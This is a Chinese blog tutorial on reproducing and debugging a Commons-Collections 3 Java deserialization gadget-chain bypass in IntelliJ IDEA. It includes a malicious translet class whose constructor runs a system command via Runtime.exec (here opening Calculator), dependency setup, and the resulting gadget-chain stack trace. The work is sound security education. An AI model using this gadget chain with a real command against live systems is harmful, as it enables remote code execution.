反序列化动态调试从0到0.5

最新推荐文章于 2024-07-05 22:28:52 发布
最新推荐文章于 2024-07-05 22:28:52 发布
阅读量191 收藏
点赞数
文章标签: intellij-idea java maven 代码规范 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42508548/article/details/129594623
版权

看到过有师傅说渗透技巧学的差不多,想入手代审又觉得基础不够,那么如果让我给建议的话肯定是先去补基础了,毕竟我也经常被JAVA大佬杨专家批评基础太差,其次的话,JAVA代审和反序列化可以说是两个维度了,这里打算就之前小乌师傅发的CC3绕过链,做一个动态调试的教程,从0到0.5,具体分析放到后面,这里只针对基础相对不好的师傅,内容过于简单望谅解。

链子在这里哈https://articles.zsxq.com/id_t1iuv0j9fopp.html

就以第一个为例

1、首先,电脑安装个IntelliJ Idea,安装和点击试用啥的这里就不说了

2、打开之后会出现一个创建项目的页面

选这样就差不多了,java环境应该都安装了吧,没有的需要提前装好

3、创建好之后,默认会有一个Main类,里面放了一个函数,输出Hello World!

点击绿色小三角,运行代码

点击Run , 成功输出了你好,世界。祝贺你,这意味着环境已经搭好了。

4、环境没问题之后,创建一个新的类,用来运行CC3_bypass

5、创建一个Main函数,输入psvm自动生成

6、将小乌师傅提供的代码贴入其中

复制代码

贴入Main函数中

7、可以看到其中有很多红色,这意味着存在错误。因为这里我们知道是CC3反序列化利用链,所以需要引入CommonsCollections3包,原理就是恶意代码在该包里面,只有引入了CC3包才能触发其恶意代码。

在pom.xml中加入如下代码引入数据包,然后点击刷新即可导入

<dependencies>
        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
</dependencies>

8、回到代码,开始解决报错问题,将鼠标移动到红色代码处,点击import class。这里报错主要是因为所需要的对象的包没有导入,所以全部进行import操作即可。

把能点的点了,导入了如下包


import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.FactoryTransformer;
import org.apache.commons.collections.functors.InstantiateFactory;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

9、现在主要剩下

setFieldValue

ClassPool

Exp

其他一些红色波浪线

这里主要是一些经验了,红色波浪线是因为代码可能存在异常,需要做try/catch处理,也有一种简单的方法,在当前函数名称后加如下代码,抛出异常

throws Exception

10、处理setFieldValue方法,这个方法在ysoserial反序列化工具中是集成在util.Reflections方法中,主要作用是反射赋予指定值,这里先简单了解,学会用即可。

在CC3_bypass类中新建一个方法,内容如下


public static void setFieldValue(Object obj, String fieldName, Object
            value) {
        try {
            Field field = obj.getClass().getDeclaredField(fieldName);
            field.setAccessible(true);
            field.set(obj, value);
        } catch (Exception e) {
        }
    }

贴完这个方法之后,只剩2个报错了,一个是ClassPool,还有一个是Exp

11、ClassPool,具体介绍可以看这里https://www.saoniuhuo.com/article/detail-106692.html

是Javassist包中的一个对象,常用来获取某个类的字节码

不讲那么多,当需要获取字节码时,往往就会用到它,所以也要在pom.xml中先导入

<dependency>
            <groupId>javassist</groupId>
            <artifactId>javassist</artifactId>
            <version>3.12.1.GA</version>
        </dependency>

再回来import即可

12、终于,到最后一个了,Exp,将鼠标放上去可以看到,推荐的解决方法时创建这个类。

前面了解了ClassPool对象主要作用是获取某个类的字节码,那么这里的字节码即是Exp类的字节码,默认没有的,所以需要创建。

当然这个类有一定要求,这里也先不说,直接使用。

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class Exp extends AbstractTranslet {
    public Exp() throws Exception{
        Runtime.getRuntime().exec("open /System/Applications/Calculator.app");
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

给出最终代码了,执行的命令是

open /System/Applications/Calculator.app

打开计算器

13,创建完Exp类之后,回到CC3_bypass,已经处理完所有报错了,执行一下

成功执行命令,弹出计算器

14、到这里,可以适当兴奋一下了,因为已经完成了30%了,证明了这个反序列化利用链的可行性,然后如果需要理解这条利用链的具体逻辑,可以放到后面,先大概debug一下代码,看看是怎么运行的。

因为知道最后是执行了Exp类中的Exp方法,直接在此处下断点

15、点击debug运行CC3_bypass

16、当代码处的红点打了个勾,并且左下角的debugger中可以看到类与方法,便是成功将代码debug到断点处了

17、右键选copy stack,即可获取比较粗糙的反序列化利用链gadget chain

如下:

<init>:11, Exp (org.example)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:62, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:423, Constructor (java.lang.reflect)
newInstance:442, Class (java.lang)
getTransletInstance:455, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
newTransformer:486, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
<init>:64, TrAXFilter (com.sun.org.apache.xalan.internal.xsltc.trax)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:62, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:423, Constructor (java.lang.reflect)
create:129, InstantiateFactory (org.apache.commons.collections.functors)
transform:73, FactoryTransformer (org.apache.commons.collections.functors)
get:158, LazyMap (org.apache.commons.collections.map)
getValue:74, TiedMapEntry (org.apache.commons.collections.keyvalue)
hashCode:121, TiedMapEntry (org.apache.commons.collections.keyvalue)
hash:338, HashMap (java.util)
readObject:1405, HashMap (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadObject:1058, ObjectStreamClass (java.io)
readSerialData:1909, ObjectInputStream (java.io)
readOrdinaryObject:1808, ObjectInputStream (java.io)
readObject0:1353, ObjectInputStream (java.io)
readObject:373, ObjectInputStream (java.io)
main:72, CC3_bypass (org.example)

18、点击某一行即可跳转到该行的类位置以及到下一个方法的位置

例如选择HashMap.readObject。代码跳转到HashMap.java的1405行,这里有个hash方法,对应流程下一步到的HashMap.hash

然后,可以算是完成了0.5了,很多原理没有讲,CC链也没有分析,留到另外0.5吧。

看完这个如果比较好奇原理方面的东西,可以看看下面两篇文章

https://t.zsxq.com/0bdNteQq4

https://t.zsxq.com/0b70j7Ake

如果想试试其他的利用链,也可以试试之前的URLDNS分析中的代码

https://t.zsxq.com/0b2z3xIna

https://t.zsxq.com/0bN85ZW5i

大夜猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队专题-漏洞挖掘代码审计-RCE-反序列化
aming小老弟
03-14 1520
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
13 万字 C 语言从入门到精通保姆级教程2021 年版
热门推荐
李南江
06-07 60万+
13 万字C语言保姆级教程,从入门到精通。
JAVA反序列化漏洞完整过程分析与调试
weixin_34198797的博客
03-08 2250
z_zz_zzz · 2016/03/04 11:080x00 前言关于JAVA的Apache Commons Collections组件反序列漏洞的分析文章已经有很多了,当我看完很多分析文章后,发现JAVA反序列漏洞的一些要点与细节未被详细描述,还需要继续分析之后才能更进一步理解并掌握这个漏洞。上述的要点与细节包括:为什么需要使用JAVA反射机制为什么需要利用sun.reflect.annota...
macOS系统下如何使用python调用os.system
qq_44174803的博客
03-02 1750
使用方法: import os os.system('open 路径名') 示例: import os os.system('open /System/Applications/Calculator.app') 运行结果:
MacOS 系统调用本地程序
CoreyXuu的博客
09-28 1199
macOS 系统和Windows系统不同,mac本地程序安装位置为:/System/Applications 所以还醒本地系统程序为:(拿本地计算器程序为例子) /** * @Auther: corey * @Date: 2020/9/28 10:09 * @Description: */ public class ExploitMac { public static void main(String[] args) { try { java.
RobotFramework自动化测试框架-移动手机自动化测试Open Application关键字的使用
weixin_30500473的博客
08-14 389
在AppiumLibrary库中,Open Application关键字用来打开一个待测试移动APP。 示例1:连接本机已经打开的appium服务端,打开一个待测试的安卓APP,指定测试平台为Android,测试的手机deviceName为98YFBP522VSU,需要打开的APP路径为C:/Users/yongqing/Desktop/app-debug.apk,APP的包名为com.exam...
使用Protostuff序列化及反序列化优化调试
敌测漏师
06-26 8646
在写自动化工具的时候经常遇到一个问题,工具前面历经坎坷做完了很多事情,但是在最后一步出错了,修改完之后要进行验证,你可能需要又重走一遍之前的步骤来拿到出现问题的场景,不得不说,这时候感觉很坑爹……     然后福利来了,我们知道java提供了序列化和反序列化机制,而另外还有很多此类序列化和反序列化框架,而protostuff则是在protobuff基础上改进的一个优秀代表。 那我们怎么用这个
详解PHP反序列化漏洞
LYJ20010728的博客
05-23 2630
PHP反序列化学习序列化与反序列化定义常见使用情况常见的序列化格式反序列化中常见的魔术方法反序列化绕过protected和private绕过__wakeup绕过(CVE-2016-7124)引用利用16进制绕过字符过滤同名方法的利用绕过部分正则字符逃逸字符增多字符减少 序列化与反序列化 定义 序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用; 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性; 常见的php
漏洞分析|Adobe ColdFusion 序列化漏洞(CVE-2023-29300)
m0_46699477的博客
08-02 1018
通过研究 CVE-2023-29300,我们了解了 Adobe ColdFusion 产品的基本工作原理,其不安全的 WDDX 序列化实现将产生可利用的漏洞。同时,我们详细分析了通过 argumentCollection 参数传入 payload 的完整调用路径,以及为何需要传入看似与利用无关的 method 参数。在此基础上,我们探索了利用的新方向,在这个过程中也踩了不少坑。阅读本篇文章后,大家在复现此漏洞以及在将来需要研究此产品时,就可以少走一些弯路了,后续有机会的话,会进一步分享研究成果。
类似 google protobuf,用于序列化/反序列化 c 结构体
03-12
"spdatapickle-0.5"这个文件可能是一个开源库或者框架,用于实现C语言中的序列化和反序列化功能。版本号"0.5"表明这是一个相对成熟但仍在改进中的项目,可能包含了一些基本功能和优化。使用这样的库,开发者可以定义...
使用K.function()调试keras操作
09-16
这对于观察动态输入(如LSTM层中的变长序列)尤其有用。以下是一个使用`K.function()`的例子: ```python from keras.layers import LSTM, Input from keras.backend import function I = Input(shape=(None, 200)...
实现0.5秒间隔的单向流水灯
11-29
在本项目中,目标是创建一个每隔0.5秒依次点亮的LED灯序列,这通常涉及单片机的定时器配置、中断处理以及GPIO端口的控制。下面将详细介绍实现这一功能的关键知识点。 首先,我们要了解**单片机**的基本概念。单片机...
Python库 | dataprotocols-0.5.18.tar.gz
03-02
2. **序列化与反序列化**:Dataprotocols库支持将Python对象转化为字节流(如JSON或XML),以便在网络中传输或者存储到磁盘,同时也支持将接收到的字节流转换回Python对象,实现数据的交换。 3. **数据验证**:在...
CarLife动态链接库使用说明1
08-08
- 安装并配置protobuf(Protocol Buffers),用于处理数据通信的序列化和反序列化。 3. 代码结构 CarLife动态链接库的代码结构可能包含以下几个关键部分: - `libcarlifevehicle.so`:这是核心动态链接库,提供了...
Intellj idea无法启动
rgbhi的博客
07-05 390
个人电脑上安装的是2024.01版本的intellj idea作为开发工具,引入了javaagent作为工具包但是在一次invaliad cache操作后,intellj idea就无法启动了,双击无响应。重装了idea后也无效(这个是有原因的,下面会讲)
mac|idea导入通义灵码插件
WinterSeven的博客
07-03 229
选择apply、ok,会出现弹窗,点击登录。
JCEF 在idea 开发 java 应用
huanghm88的专栏
07-03 416
2. 将JCEF库文件导入到IDEA项目中:在IDEA中打开您的项目,然后将JCEF库文件添加为项目的依赖。可以通过将JCEF库文件复制到项目的lib目录中,然后在IDEA中选择"File" -> "Project Structure" -> "Modules",然后在"Dependencies"选项卡中添加JCEF库文件。1. 下载JCEF库文件:您可以从JCEF的官方网站(https://bitbucket.org/chromiumembedded/java-cef)下载最新版本的JCEF库文件。
idea创建spring boot项目,java版本只能选择17和21
最新发布
weixin_63680330的博客
07-05 250
修改Server URL为https://start.aliyun.com。创建spring boot没有java对应11的可选。目前阿里云还是支持创建Spring2.X版本的项目的。
idea如何连接gitee仓库
m0_62600503的博客
07-05 450
把项目的https克隆到idea中就行了。复制到idea上就行了。1.先在idea上登录gitee账号。在gitee官网上生成令牌。
复杂xml序列化反序列化
05-08
XML序列化和反序列化是将对象转换为XML格式或将XML格式转换回对象的过程。如果要序列化或反序列化复杂的XML结构,需要遵循以下步骤: 1. 创建XML文档对象并定义XML命名空间。 2. 创建与XML结构相对应的类和属性,并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值